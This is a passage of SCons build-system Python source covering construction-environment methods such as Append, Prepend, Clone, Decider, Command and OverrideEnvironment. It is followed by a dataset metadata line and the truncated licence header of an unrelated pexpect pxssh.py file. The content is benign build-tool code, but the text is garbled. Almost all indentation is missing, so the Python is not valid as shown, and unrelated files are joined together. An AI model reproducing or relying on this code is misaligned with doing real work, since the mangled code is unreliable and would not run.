except AttributeError:
# The original isn't a list, but the new
# value is (by process of elimination),
# so insert the original in the new value
# (if there's one to insert) and replace
# the variable with it.
if orig:
val.insert(0, orig)
self._dict[key] = val
else:
# The original is a list, so append the new
# value to it (if there's a value to append).
if val:
add_to_orig(val)
else:
# The original looks like a dictionary, so update it
# based on what we think the value looks like.
if SCons.Util.is_List(val):
for v in val:
orig[v] = None
else:
try:
update_dict(val)
except (AttributeError, TypeError, ValueError):
if SCons.Util.is_Dict(val):
for k, v in val.items():
orig[k] = v
else:
orig[val] = None
self.scanner_map_delete(kw)
# allow Dirs and strings beginning with # for top-relative
# Note this uses the current env's fs (in self).
def _canonicalize(self, path):
if not SCons.Util.is_String(path): # typically a Dir
path = str(path)
if path and path[0] == '#':
path = str(self.fs.Dir(path))
return path
def AppendENVPath(self, name, newpath, envname = 'ENV',
sep = os.pathsep, delete_existing=1):
"""Append path elements to the path 'name' in the 'ENV'
dictionary for this environment. Will only add any particular
path once, and will normpath and normcase all paths to help
assure this. This can also handle the case where the env
variable is a list instead of a string.
If delete_existing is 0, a newpath which is already in the path
will not be moved to the end (it will be left where it is).
"""
orig = ''
if envname in self._dict and name in self._dict[envname]:
orig = self._dict[envname][name]
nv = SCons.Util.AppendPath(orig, newpath, sep, delete_existing,
canonicalize=self._canonicalize)
if envname not in self._dict:
self._dict[envname] = {}
self._dict[envname][name] = nv
def AppendUnique(self, delete_existing=0, **kw):
"""Append values to existing construction variables
in an Environment, if they're not already there.
If delete_existing is 1, removes existing values first, so
values move to end.
"""
kw = copy_non_reserved_keywords(kw)
for key, val in kw.items():
if SCons.Util.is_List(val):
val = _delete_duplicates(val, delete_existing)
if key not in self._dict or self._dict[key] in ('', None):
self._dict[key] = val
elif SCons.Util.is_Dict(self._dict[key]) and \
SCons.Util.is_Dict(val):
self._dict[key].update(val)
elif SCons.Util.is_List(val):
dk = self._dict[key]
if not SCons.Util.is_List(dk):
dk = [dk]
if delete_existing:
dk = [x for x in dk if x not in val]
else:
val = [x for x in val if x not in dk]
self._dict[key] = dk + val
else:
dk = self._dict[key]
if SCons.Util.is_List(dk):
# By elimination, val is not a list. Since dk is a
# list, wrap val in a list first.
if delete_existing:
dk = [x for x in dk if x not in val]
self._dict[key] = dk + [val]
else:
if not val in dk:
self._dict[key] = dk + [val]
else:
if delete_existing:
dk = [x for x in dk if x not in val]
self._dict[key] = dk + val
self.scanner_map_delete(kw)
def Clone(self, tools=[], toolpath=None, parse_flags = None, **kw):
"""Return a copy of a construction Environment. The
copy is like a Python "deep copy"--that is, independent
        copies are made recursively of each object--except that
a reference is copied when an object is not deep-copyable
(like a function). There are no references to any mutable
objects in the original Environment.
"""
clone = copy.copy(self)
clone._dict = semi_deepcopy(self._dict)
try:
cbd = clone._dict['BUILDERS']
except KeyError:
pass
else:
clone._dict['BUILDERS'] = BuilderDict(cbd, clone)
# Check the methods added via AddMethod() and re-bind them to
# the cloned environment. Only do this if the attribute hasn't
# been overwritten by the user explicitly and still points to
# the added method.
clone.added_methods = []
for mw in self.added_methods:
if mw == getattr(self, mw.name):
clone.added_methods.append(mw.clone(clone))
clone._memo = {}
# Apply passed-in variables before the tools
# so the tools can use the new variables
kw = copy_non_reserved_keywords(kw)
new = {}
for key, value in kw.items():
new[key] = SCons.Subst.scons_subst_once(value, self, key)
clone.Replace(**new)
apply_tools(clone, tools, toolpath)
# apply them again in case the tools overwrote them
clone.Replace(**new)
# Finally, apply any flags to be merged in
if parse_flags: clone.MergeFlags(parse_flags)
if __debug__: logInstanceCreation(self, 'Environment.EnvironmentClone')
return clone
def Copy(self, *args, **kw):
global _warn_copy_deprecated
if _warn_copy_deprecated:
msg = "The env.Copy() method is deprecated; use the env.Clone() method instead."
SCons.Warnings.warn(SCons.Warnings.DeprecatedCopyWarning, msg)
_warn_copy_deprecated = False
return self.Clone(*args, **kw)
def _changed_build(self, dependency, target, prev_ni):
if dependency.changed_state(target, prev_ni):
return 1
return self.decide_source(dependency, target, prev_ni)
def _changed_content(self, dependency, target, prev_ni):
return dependency.changed_content(target, prev_ni)
def _changed_source(self, dependency, target, prev_ni):
target_env = dependency.get_build_env()
type = target_env.get_tgt_sig_type()
if type == 'source':
return target_env.decide_source(dependency, target, prev_ni)
else:
return target_env.decide_target(dependency, target, prev_ni)
def _changed_timestamp_then_content(self, dependency, target, prev_ni):
return dependency.changed_timestamp_then_content(target, prev_ni)
def _changed_timestamp_newer(self, dependency, target, prev_ni):
return dependency.changed_timestamp_newer(target, prev_ni)
def _changed_timestamp_match(self, dependency, target, prev_ni):
return dependency.changed_timestamp_match(target, prev_ni)
def _copy_from_cache(self, src, dst):
return self.fs.copy(src, dst)
def _copy2_from_cache(self, src, dst):
return self.fs.copy2(src, dst)
def Decider(self, function):
copy_function = self._copy2_from_cache
if function in ('MD5', 'content'):
if not SCons.Util.md5:
raise UserError("MD5 signatures are not available in this version of Python.")
function = self._changed_content
elif function == 'MD5-timestamp':
function = self._changed_timestamp_then_content
elif function in ('timestamp-newer', 'make'):
function = self._changed_timestamp_newer
copy_function = self._copy_from_cache
elif function == 'timestamp-match':
function = self._changed_timestamp_match
elif not callable(function):
raise UserError("Unknown Decider value %s" % repr(function))
# We don't use AddMethod because we don't want to turn the
# function, which only expects three arguments, into a bound
# method, which would add self as an initial, fourth argument.
self.decide_target = function
self.decide_source = function
self.copy_from_cache = copy_function
def Detect(self, progs):
"""Return the first available program in progs.
"""
if not SCons.Util.is_List(progs):
progs = [ progs ]
for prog in progs:
path = self.WhereIs(prog)
if path: return prog
return None
def Dictionary(self, *args):
if not args:
return self._dict
dlist = [self._dict[x] for x in args]
if len(dlist) == 1:
dlist = dlist[0]
return dlist
def Dump(self, key = None):
"""
Using the standard Python pretty printer, dump the contents of the
scons build environment to stdout.
If the key passed in is anything other than None, then that will
be used as an index into the build environment dictionary and
whatever is found there will be fed into the pretty printer. Note
that this key is case sensitive.
"""
import pprint
pp = pprint.PrettyPrinter(indent=2)
if key:
dict = self.Dictionary(key)
else:
dict = self.Dictionary()
return pp.pformat(dict)
def FindIxes(self, paths, prefix, suffix):
"""
Search a list of paths for something that matches the prefix and suffix.
paths - the list of paths or nodes.
prefix - construction variable for the prefix.
suffix - construction variable for the suffix.
"""
suffix = self.subst('$'+suffix)
prefix = self.subst('$'+prefix)
for path in paths:
dir,name = os.path.split(str(path))
if name[:len(prefix)] == prefix and name[-len(suffix):] == suffix:
return path
def ParseConfig(self, command, function=None, unique=1):
"""
Use the specified function to parse the output of the command
in order to modify the current environment. The 'command' can
be a string or a list of strings representing a command and
its arguments. 'Function' is an optional argument that takes
the environment, the output of the command, and the unique flag.
If no function is specified, MergeFlags, which treats the output
as the result of a typical 'X-config' command (i.e. gtk-config),
will merge the output into the appropriate variables.
"""
if function is None:
def parse_conf(env, cmd, unique=unique):
return env.MergeFlags(cmd, unique)
function = parse_conf
if SCons.Util.is_List(command):
command = ' '.join(command)
command = self.subst(command)
return function(self, self.backtick(command))
def ParseDepends(self, filename, must_exist=None, only_one=0):
"""
Parse a mkdep-style file for explicit dependencies. This is
completely abusable, and should be unnecessary in the "normal"
case of proper SCons configuration, but it may help make
the transition from a Make hierarchy easier for some people
to swallow. It can also be genuinely useful when using a tool
that can write a .d file, but for which writing a scanner would
be too complicated.
"""
filename = self.subst(filename)
try:
fp = open(filename, 'r')
except IOError:
if must_exist:
raise
return
lines = SCons.Util.LogicalLines(fp).readlines()
lines = [l for l in lines if l[0] != '#']
tdlist = []
for line in lines:
try:
target, depends = line.split(':', 1)
except (AttributeError, ValueError):
# Throws AttributeError if line isn't a string. Can throw
# ValueError if line doesn't split into two or more elements.
pass
else:
tdlist.append((target.split(), depends.split()))
if only_one:
targets = []
for td in tdlist:
targets.extend(td[0])
if len(targets) > 1:
raise SCons.Errors.UserError(
"More than one dependency target found in `%s': %s"
% (filename, targets))
for target, depends in tdlist:
self.Depends(target, depends)
def Platform(self, platform):
platform = self.subst(platform)
return SCons.Platform.Platform(platform)(self)
def Prepend(self, **kw):
"""Prepend values to existing construction variables
in an Environment.
"""
kw = copy_non_reserved_keywords(kw)
for key, val in kw.items():
# It would be easier on the eyes to write this using
# "continue" statements whenever we finish processing an item,
# but Python 1.5.2 apparently doesn't let you use "continue"
# within try:-except: blocks, so we have to nest our code.
try:
orig = self._dict[key]
except KeyError:
# No existing variable in the environment, so just set
# it to the new value.
self._dict[key] = val
else:
try:
# Check if the original looks like a dictionary.
# If it is, we can't just try adding the value because
# dictionaries don't have __add__() methods, and
# things like UserList will incorrectly coerce the
# original dict to a list (which we don't want).
update_dict = orig.update
except AttributeError:
try:
# Most straightforward: just try to add them
# together. This will work in most cases, when the
# original and new values are of compatible types.
self._dict[key] = val + orig
except (KeyError, TypeError):
try:
# Check if the added value is a list.
add_to_val = val.append
except AttributeError:
# The added value isn't a list, but the
# original is (by process of elimination),
                            # so insert the new value in the original
# (if there's one to insert).
if val:
orig.insert(0, val)
else:
# The added value is a list, so append
# the original to it (if there's a value
# to append).
if orig:
add_to_val(orig)
self._dict[key] = val
else:
# The original looks like a dictionary, so update it
# based on what we think the value looks like.
if SCons.Util.is_List(val):
for v in val:
orig[v] = None
else:
try:
update_dict(val)
except (AttributeError, TypeError, ValueError):
if SCons.Util.is_Dict(val):
for k, v in val.items():
orig[k] = v
else:
orig[val] = None
self.scanner_map_delete(kw)
def PrependENVPath(self, name, newpath, envname = 'ENV', sep = os.pathsep,
delete_existing=1):
"""Prepend path elements to the path 'name' in the 'ENV'
dictionary for this environment. Will only add any particular
path once, and will normpath and normcase all paths to help
assure this. This can also handle the case where the env
variable is a list instead of a string.
If delete_existing is 0, a newpath which is already in the path
will not be moved to the front (it will be left where it is).
"""
orig = ''
if envname in self._dict and name in self._dict[envname]:
orig = self._dict[envname][name]
nv = SCons.Util.PrependPath(orig, newpath, sep, delete_existing,
canonicalize=self._canonicalize)
if envname not in self._dict:
self._dict[envname] = {}
self._dict[envname][name] = nv
def PrependUnique(self, delete_existing=0, **kw):
"""Prepend values to existing construction variables
in an Environment, if they're not already there.
If delete_existing is 1, removes existing values first, so
values move to front.
"""
kw = copy_non_reserved_keywords(kw)
for key, val in kw.items():
if SCons.Util.is_List(val):
val = _delete_duplicates(val, not delete_existing)
if key not in self._dict or self._dict[key] in ('', None):
self._dict[key] = val
elif SCons.Util.is_Dict(self._dict[key]) and \
SCons.Util.is_Dict(val):
self._dict[key].update(val)
elif SCons.Util.is_List(val):
dk = self._dict[key]
if not SCons.Util.is_List(dk):
dk = [dk]
if delete_existing:
dk = [x for x in dk if x not in val]
else:
val = [x for x in val if x not in dk]
self._dict[key] = val + dk
else:
dk = self._dict[key]
if SCons.Util.is_List(dk):
# By elimination, val is not a list. Since dk is a
# list, wrap val in a list first.
if delete_existing:
dk = [x for x in dk if x not in val]
self._dict[key] = [val] + dk
else:
if not val in dk:
self._dict[key] = [val] + dk
else:
if delete_existing:
dk = [x for x in dk if x not in val]
self._dict[key] = val + dk
self.scanner_map_delete(kw)
def Replace(self, **kw):
"""Replace existing construction variables in an Environment
with new construction variables and/or values.
"""
try:
kwbd = kw['BUILDERS']
except KeyError:
pass
else:
kwbd = semi_deepcopy(kwbd)
del kw['BUILDERS']
self.__setitem__('BUILDERS', kwbd)
kw = copy_non_reserved_keywords(kw)
self._update(semi_deepcopy(kw))
self.scanner_map_delete(kw)
def ReplaceIxes(self, path, old_prefix, old_suffix, new_prefix, new_suffix):
"""
Replace old_prefix with new_prefix and old_suffix with new_suffix.
env - Environment used to interpolate variables.
path - the path that will be modified.
old_prefix - construction variable for the old prefix.
old_suffix - construction variable for the old suffix.
new_prefix - construction variable for the new prefix.
new_suffix - construction variable for the new suffix.
"""
old_prefix = self.subst('$'+old_prefix)
old_suffix = self.subst('$'+old_suffix)
new_prefix = self.subst('$'+new_prefix)
new_suffix = self.subst('$'+new_suffix)
dir,name = os.path.split(str(path))
if name[:len(old_prefix)] == old_prefix:
name = name[len(old_prefix):]
if name[-len(old_suffix):] == old_suffix:
name = name[:-len(old_suffix)]
return os.path.join(dir, new_prefix+name+new_suffix)
def SetDefault(self, **kw):
for k in kw.keys():
if k in self._dict:
del kw[k]
self.Replace(**kw)
def _find_toolpath_dir(self, tp):
return self.fs.Dir(self.subst(tp)).srcnode().abspath
def Tool(self, tool, toolpath=None, **kw):
if SCons.Util.is_String(tool):
tool = self.subst(tool)
if toolpath is None:
toolpath = self.get('toolpath', [])
toolpath = list(map(self._find_toolpath_dir, toolpath))
tool = SCons.Tool.Tool(tool, toolpath, **kw)
tool(self)
def WhereIs(self, prog, path=None, pathext=None, reject=[]):
"""Find prog in the path.
"""
if path is None:
try:
path = self['ENV']['PATH']
except KeyError:
pass
elif SCons.Util.is_String(path):
path = self.subst(path)
if pathext is None:
try:
pathext = self['ENV']['PATHEXT']
except KeyError:
pass
elif SCons.Util.is_String(pathext):
pathext = self.subst(pathext)
prog = self.subst(prog)
path = SCons.Util.WhereIs(prog, path, pathext, reject)
if path: return path
return None
#######################################################################
# Public methods for doing real "SCons stuff" (manipulating
# dependencies, setting attributes on targets, etc.). These begin
# with upper-case letters. The essential characteristic of methods
# in this section is that they all *should* have corresponding
# same-named global functions.
#######################################################################
def Action(self, *args, **kw):
def subst_string(a, self=self):
if SCons.Util.is_String(a):
a = self.subst(a)
return a
nargs = list(map(subst_string, args))
nkw = self.subst_kw(kw)
return SCons.Action.Action(*nargs, **nkw)
def AddPreAction(self, files, action):
nodes = self.arg2nodes(files, self.fs.Entry)
action = SCons.Action.Action(action)
uniq = {}
for executor in [n.get_executor() for n in nodes]:
uniq[executor] = 1
for executor in uniq.keys():
executor.add_pre_action(action)
return nodes
def AddPostAction(self, files, action):
nodes = self.arg2nodes(files, self.fs.Entry)
action = SCons.Action.Action(action)
uniq = {}
for executor in [n.get_executor() for n in nodes]:
uniq[executor] = 1
for executor in uniq.keys():
executor.add_post_action(action)
return nodes
def Alias(self, target, source=[], action=None, **kw):
tlist = self.arg2nodes(target, self.ans.Alias)
if not SCons.Util.is_List(source):
source = [source]
source = [_f for _f in source if _f]
if not action:
if not source:
# There are no source files and no action, so just
# return a target list of classic Alias Nodes, without
# any builder. The externally visible effect is that
# this will make the wrapping Script.BuildTask class
# say that there's "Nothing to be done" for this Alias,
# instead of that it's "up to date."
return tlist
# No action, but there are sources. Re-call all the target
# builders to add the sources to each target.
result = []
for t in tlist:
bld = t.get_builder(AliasBuilder)
result.extend(bld(self, t, source))
return result
nkw = self.subst_kw(kw)
nkw.update({
'action' : SCons.Action.Action(action),
'source_factory' : self.fs.Entry,
'multi' : 1,
'is_explicit' : None,
})
bld = SCons.Builder.Builder(**nkw)
# Apply the Builder separately to each target so that the Aliases
# stay separate. If we did one "normal" Builder call with the
# whole target list, then all of the target Aliases would be
# associated under a single Executor.
result = []
for t in tlist:
# Calling the convert() method will cause a new Executor to be
# created from scratch, so we have to explicitly initialize
# it with the target's existing sources, plus our new ones,
# so nothing gets lost.
b = t.get_builder()
if b is None or b is AliasBuilder:
b = bld
else:
nkw['action'] = b.action + action
b = SCons.Builder.Builder(**nkw)
t.convert()
result.extend(b(self, t, t.sources + source))
return result
def AlwaysBuild(self, *targets):
tlist = []
for t in targets:
tlist.extend(self.arg2nodes(t, self.fs.Entry))
for t in tlist:
t.set_always_build()
return tlist
def BuildDir(self, *args, **kw):
msg = """BuildDir() and the build_dir keyword have been deprecated;\n\tuse VariantDir() and the variant_dir keyword instead."""
SCons.Warnings.warn(SCons.Warnings.DeprecatedBuildDirWarning, msg)
if 'build_dir' in kw:
kw['variant_dir'] = kw['build_dir']
del kw['build_dir']
return self.VariantDir(*args, **kw)
def Builder(self, **kw):
nkw = self.subst_kw(kw)
return SCons.Builder.Builder(**nkw)
def CacheDir(self, path):
import SCons.CacheDir
if path is not None:
path = self.subst(path)
self._CacheDir_path = path
def Clean(self, targets, files):
global CleanTargets
tlist = self.arg2nodes(targets, self.fs.Entry)
flist = self.arg2nodes(files, self.fs.Entry)
for t in tlist:
try:
CleanTargets[t].extend(flist)
except KeyError:
CleanTargets[t] = flist
def Configure(self, *args, **kw):
nargs = [self]
if args:
nargs = nargs + self.subst_list(args)[0]
nkw = self.subst_kw(kw)
nkw['_depth'] = kw.get('_depth', 0) + 1
try:
nkw['custom_tests'] = self.subst_kw(nkw['custom_tests'])
except KeyError:
pass
return SCons.SConf.SConf(*nargs, **nkw)
def Command(self, target, source, action, **kw):
"""Builds the supplied target files from the supplied
source files using the supplied action. Action may
be any type that the Builder constructor will accept
for an action."""
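        # Usage sketch (target, source and command string are hypothetical):
        #
        #   env.Command('version.h', 'version.h.in',
        #               'sed s/@VERSION@/1.0/ < $SOURCE > $TARGET')
        #   # builds version.h from version.h.in with the given shell command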
bkw = {
'action' : action,
'target_factory' : self.fs.Entry,
'source_factory' : self.fs.Entry,
}
try: bkw['source_scanner'] = kw['source_scanner']
except KeyError: pass
else: del kw['source_scanner']
bld = SCons.Builder.Builder(**bkw)
return bld(self, target, source, **kw)
def Depends(self, target, dependency):
"""Explicity specify that 'target's depend on 'dependency'."""
tlist = self.arg2nodes(target, self.fs.Entry)
dlist = self.arg2nodes(dependency, self.fs.Entry)
for t in tlist:
t.add_dependency(dlist)
return tlist
def Dir(self, name, *args, **kw):
"""
"""
s = self.subst(name)
if SCons.Util.is_Sequence(s):
result=[]
for e in s:
result.append(self.fs.Dir(e, *args, **kw))
return result
return self.fs.Dir(s, *args, **kw)
def NoClean(self, *targets):
"""Tags a target so that it will not be cleaned by -c"""
tlist = []
for t in targets:
tlist.extend(self.arg2nodes(t, self.fs.Entry))
for t in tlist:
t.set_noclean()
return tlist
def NoCache(self, *targets):
"""Tags a target so that it will not be cached"""
tlist = []
for t in targets:
tlist.extend(self.arg2nodes(t, self.fs.Entry))
for t in tlist:
t.set_nocache()
return tlist
def Entry(self, name, *args, **kw):
"""
"""
s = self.subst(name)
if SCons.Util.is_Sequence(s):
result=[]
for e in s:
result.append(self.fs.Entry(e, *args, **kw))
return result
return self.fs.Entry(s, *args, **kw)
def Environment(self, **kw):
return SCons.Environment.Environment(**self.subst_kw(kw))
def Execute(self, action, *args, **kw):
"""Directly execute an action through an Environment
"""
action = self.Action(action, *args, **kw)
result = action([], [], self)
if isinstance(result, SCons.Errors.BuildError):
errstr = result.errstr
if result.filename:
errstr = result.filename + ': ' + errstr
sys.stderr.write("scons: *** %s\n" % errstr)
return result.status
else:
return result
def File(self, name, *args, **kw):
"""
"""
s = self.subst(name)
if SCons.Util.is_Sequence(s):
result=[]
for e in s:
result.append(self.fs.File(e, *args, **kw))
return result
return self.fs.File(s, *args, **kw)
def FindFile(self, file, dirs):
file = self.subst(file)
nodes = self.arg2nodes(dirs, self.fs.Dir)
return SCons.Node.FS.find_file(file, tuple(nodes))
def Flatten(self, sequence):
return SCons.Util.flatten(sequence)
def GetBuildPath(self, files):
result = list(map(str, self.arg2nodes(files, self.fs.Entry)))
if SCons.Util.is_List(files):
return result
else:
return result[0]
def Glob(self, pattern, ondisk=True, source=False, strings=False):
return self.fs.Glob(self.subst(pattern), ondisk, source, strings)
def Ignore(self, target, dependency):
"""Ignore a dependency."""
tlist = self.arg2nodes(target, self.fs.Entry)
dlist = self.arg2nodes(dependency, self.fs.Entry)
for t in tlist:
t.add_ignore(dlist)
return tlist
def Literal(self, string):
return SCons.Subst.Literal(string)
def Local(self, *targets):
ret = []
for targ in targets:
if isinstance(targ, SCons.Node.Node):
targ.set_local()
ret.append(targ)
else:
for t in self.arg2nodes(targ, self.fs.Entry):
t.set_local()
ret.append(t)
return ret
def Precious(self, *targets):
tlist = []
for t in targets:
tlist.extend(self.arg2nodes(t, self.fs.Entry))
for t in tlist:
t.set_precious()
return tlist
def Repository(self, *dirs, **kw):
dirs = self.arg2nodes(list(dirs), self.fs.Dir)
self.fs.Repository(*dirs, **kw)
def Requires(self, target, prerequisite):
"""Specify that 'prerequisite' must be built before 'target',
(but 'target' does not actually depend on 'prerequisite'
and need not be rebuilt if it changes)."""
tlist = self.arg2nodes(target, self.fs.Entry)
plist = self.arg2nodes(prerequisite, self.fs.Entry)
for t in tlist:
t.add_prerequisite(plist)
return tlist
def Scanner(self, *args, **kw):
nargs = []
for arg in args:
if SCons.Util.is_String(arg):
arg = self.subst(arg)
nargs.append(arg)
nkw = self.subst_kw(kw)
return SCons.Scanner.Base(*nargs, **nkw)
def SConsignFile(self, name=".sconsign", dbm_module=None):
if name is not None:
name = self.subst(name)
if not os.path.isabs(name):
name = os.path.join(str(self.fs.SConstruct_dir), name)
if name:
name = os.path.normpath(name)
sconsign_dir = os.path.dirname(name)
if sconsign_dir and not os.path.exists(sconsign_dir):
self.Execute(SCons.Defaults.Mkdir(sconsign_dir))
SCons.SConsign.File(name, dbm_module)
def SideEffect(self, side_effect, target):
"""Tell scons that side_effects are built as side
effects of building targets."""
side_effects = self.arg2nodes(side_effect, self.fs.Entry)
targets = self.arg2nodes(target, self.fs.Entry)
for side_effect in side_effects:
if side_effect.multiple_side_effect_has_builder():
raise SCons.Errors.UserError("Multiple ways to build the same target were specified for: %s" % str(side_effect))
side_effect.add_source(targets)
side_effect.side_effect = 1
self.Precious(side_effect)
for target in targets:
target.side_effects.append(side_effect)
return side_effects
def SourceCode(self, entry, builder):
"""Arrange for a source code builder for (part of) a tree."""
msg = """SourceCode() has been deprecated and there is no replacement.
\tIf you need this function, please contact [email protected]."""
SCons.Warnings.warn(SCons.Warnings.DeprecatedSourceCodeWarning, msg)
entries = self.arg2nodes(entry, self.fs.Entry)
for entry in entries:
entry.set_src_builder(builder)
return entries
def SourceSignatures(self, type):
global _warn_source_signatures_deprecated
if _warn_source_signatures_deprecated:
msg = "The env.SourceSignatures() method is deprecated;\n" + \
"\tconvert your build to use the env.Decider() method instead."
SCons.Warnings.warn(SCons.Warnings.DeprecatedSourceSignaturesWarning, msg)
_warn_source_signatures_deprecated = False
type = self.subst(type)
self.src_sig_type = type
if type == 'MD5':
if not SCons.Util.md5:
raise UserError("MD5 signatures are not available in this version of Python.")
self.decide_source = self._changed_content
elif type == 'timestamp':
self.decide_source = self._changed_timestamp_match
else:
raise UserError("Unknown source signature type '%s'" % type)
def Split(self, arg):
"""This function converts a string or list into a list of strings
or Nodes. This makes things easier for users by allowing files to
        be specified as a white-space separated string that will be split.
The input rules are:
- A single string containing names separated by spaces. These will be
split apart at the spaces.
- A single Node instance
- A list containing either strings or Node instances. Any strings
in the list are not split at spaces.
In all cases, the function returns a list of Nodes and strings."""
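        # Usage sketch:
        #
        #   env.Split('foo.c bar.c baz.c')    # -> ['foo.c', 'bar.c', 'baz.c']
        #   env.Split(['foo.c', 'bar baz'])   # -> ['foo.c', 'bar baz']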
if SCons.Util.is_List(arg):
return list(map(self.subst, arg))
elif SCons.Util.is_String(arg):
return self.subst(arg).split()
else:
return [self.subst(arg)]
def TargetSignatures(self, type):
global _warn_target_signatures_deprecated
if _warn_target_signatures_deprecated:
msg = "The env.TargetSignatures() method is deprecated;\n" + \
"\tconvert your build to use the env.Decider() method instead."
SCons.Warnings.warn(SCons.Warnings.DeprecatedTargetSignaturesWarning, msg)
_warn_target_signatures_deprecated = False
type = self.subst(type)
self.tgt_sig_type = type
if type in ('MD5', 'content'):
if not SCons.Util.md5:
raise UserError("MD5 signatures are not available in this version of Python.")
self.decide_target = self._changed_content
elif type == 'timestamp':
self.decide_target = self._changed_timestamp_match
elif type == 'build':
self.decide_target = self._changed_build
elif type == 'source':
self.decide_target = self._changed_source
else:
raise UserError("Unknown target signature type '%s'"%type)
def Value(self, value, built_value=None):
"""
"""
return SCons.Node.Python.Value(value, built_value)
def VariantDir(self, variant_dir, src_dir, duplicate=1):
variant_dir = self.arg2nodes(variant_dir, self.fs.Dir)[0]
src_dir = self.arg2nodes(src_dir, self.fs.Dir)[0]
self.fs.VariantDir(variant_dir, src_dir, duplicate)
def FindSourceFiles(self, node='.'):
""" returns a list of all source files.
"""
node = self.arg2nodes(node, self.fs.Entry)[0]
sources = []
def build_source(ss):
for s in ss:
if isinstance(s, SCons.Node.FS.Dir):
build_source(s.all_children())
elif s.has_builder():
build_source(s.sources)
elif isinstance(s.disambiguate(), SCons.Node.FS.File):
sources.append(s)
build_source(node.all_children())
# THIS CODE APPEARS TO HAVE NO EFFECT
# # get the final srcnode for all nodes, this means stripping any
# # attached build node by calling the srcnode function
# for file in sources:
# srcnode = file.srcnode()
# while srcnode != file.srcnode():
# srcnode = file.srcnode()
# remove duplicates
return list(set(sources))
def FindInstalledFiles(self):
""" returns the list of all targets of the Install and InstallAs Builder.
"""
from SCons.Tool import install
if install._UNIQUE_INSTALLED_FILES is None:
install._UNIQUE_INSTALLED_FILES = SCons.Util.uniquer_hashables(install._INSTALLED_FILES)
return install._UNIQUE_INSTALLED_FILES
class OverrideEnvironment(Base):
"""A proxy that overrides variables in a wrapped construction
environment by returning values from an overrides dictionary in
preference to values from the underlying subject environment.
This is a lightweight (I hope) proxy that passes through most use of
attributes to the underlying Environment.Base class, but has just
enough additional methods defined to act like a real construction
environment with overridden values. It can wrap either a Base
construction environment, or another OverrideEnvironment, which
can in turn nest arbitrary OverrideEnvironments...
Note that we do *not* call the underlying base class
    (SubstitutionEnvironment) initialization, because we get most of those
from proxying the attributes of the subject construction environment.
But because we subclass SubstitutionEnvironment, this class also
has inherited arg2nodes() and subst*() methods; those methods can't
be proxied because they need *this* object's methods to fetch the
values from the overrides dictionary.
"""
def __init__(self, subject, overrides={}):
if __debug__: logInstanceCreation(self, 'Environment.OverrideEnvironment')
self.__dict__['__subject'] = subject
self.__dict__['overrides'] = overrides
# Methods that make this class act like a proxy.
def __getattr__(self, name):
return getattr(self.__dict__['__subject'], name)
def __setattr__(self, name, value):
setattr(self.__dict__['__subject'], name, value)
# Methods that make this class act like a dictionary.
def __getitem__(self, key):
try:
return self.__dict__['overrides'][key]
except KeyError:
return self.__dict__['__subject'].__getitem__(key)
def __setitem__(self, key, value):
if not is_valid_construction_var(key):
raise SCons.Errors.UserError("Illegal construction variable `%s'" % key)
self.__dict__['overrides'][key] = value
def __delitem__(self, key):
try:
del self.__dict__['overrides'][key]
except KeyError:
deleted = 0
else:
deleted = 1
try:
result = self.__dict__['__subject'].__delitem__(key)
except KeyError:
if not deleted:
raise
result = None
return result
def get(self, key, default=None):
"""Emulates the get() method of dictionaries."""
try:
return self.__dict__['overrides'][key]
except KeyError:
return self.__dict__['__subject'].get(key, default)
def has_key(self, key):
try:
self.__dict__['overrides'][key]
return 1
except KeyError:
return key in self.__dict__['__subject']
def __contains__(self, key):
if self.__dict__['overrides'].__contains__(key):
return 1
return self.__dict__['__subject'].__contains__(key)
def Dictionary(self):
"""Emulates the items() method of dictionaries."""
d = self.__dict__['__subject'].Dictionary().copy()
d.update(self.__dict__['overrides'])
return d
def items(self):
"""Emulates the items() method of dictionaries."""
return list(self.Dictionary().items())
# Overridden private construction environment methods.
def _update(self, dict):
"""Update an environment's values directly, bypassing the normal
checks that occur when users try to set items.
"""
self.__dict__['overrides'].update(dict)
def gvars(self):
return self.__dict__['__subject'].gvars()
def lvars(self):
lvars = self.__dict__['__subject'].lvars()
lvars.update(self.__dict__['overrides'])
return lvars
# Overridden public construction environment methods.
def Replace(self, **kw):
kw = copy_non_reserved_keywords(kw)
self.__dict__['overrides'].update(semi_deepcopy(kw))
# The entry point that will be used by the external world
# to refer to a construction environment. This allows the wrapper
# interface to extend a construction environment for its own purposes
# by subclassing SCons.Environment.Base and then assigning the
# class to SCons.Environment.Environment.
Environment = Base
# An entry point for returning a proxy subclass instance that overrides
# the subst*() methods so they don't actually perform construction
# variable substitution. This is specifically intended to be the shim
# layer in between global function calls (which don't want construction
# variable substitution) and the DefaultEnvironment() (which would
# substitute variables if left to its own devices).
#
# We have to wrap this in a function that allows us to delay definition of
# the class until it's necessary, so that when it subclasses Environment
# it will pick up whatever Environment subclass the wrapper interface
# might have assigned to SCons.Environment.Environment.
def NoSubstitutionProxy(subject):
class _NoSubstitutionProxy(Environment):
def __init__(self, subject):
self.__dict__['__subject'] = subject
def __getattr__(self, name):
return getattr(self.__dict__['__subject'], name)
def __setattr__(self, name, value):
return setattr(self.__dict__['__subject'], name, value)
def raw_to_mode(self, dict):
try:
raw = dict['raw']
except KeyError:
pass
else:
del dict['raw']
dict['mode'] = raw
def subst(self, string, *args, **kwargs):
return string
def subst_kw(self, kw, *args, **kwargs):
return kw
def subst_list(self, string, *args, **kwargs):
nargs = (string, self,) + args
nkw = kwargs.copy()
nkw['gvars'] = {}
self.raw_to_mode(nkw)
return SCons.Subst.scons_subst_list(*nargs, **nkw)
def subst_target_source(self, string, *args, **kwargs):
nargs = (string, self,) + args
nkw = kwargs.copy()
nkw['gvars'] = {}
self.raw_to_mode(nkw)
return SCons.Subst.scons_subst(*nargs, **nkw)
return _NoSubstitutionProxy(subject)
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
mit
|
joymarquis/mscc
|
general/lib/python/pexpect-4.0.1/pexpect/pxssh.py
|
12
|
18725
|
'''This class extends pexpect.spawn to specialize setting up SSH connections.
This adds methods for login, logout, and expecting the shell prompt.
PEXPECT LICENSE
This license is approved by the OSI and FSF as GPL-compatible.
http://opensource.org/licenses/isc-license.txt
Copyright (c) 2012, Noah Spurrier <[email protected]>
PERMISSION TO USE, COPY, MODIFY, AND/OR DISTRIBUTE THIS SOFTWARE FOR ANY
PURPOSE WITH OR WITHOUT FEE IS HEREBY GRANTED, PROVIDED THAT THE ABOVE
COPYRIGHT NOTICE AND THIS PERMISSION NOTICE APPEAR IN ALL COPIES.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
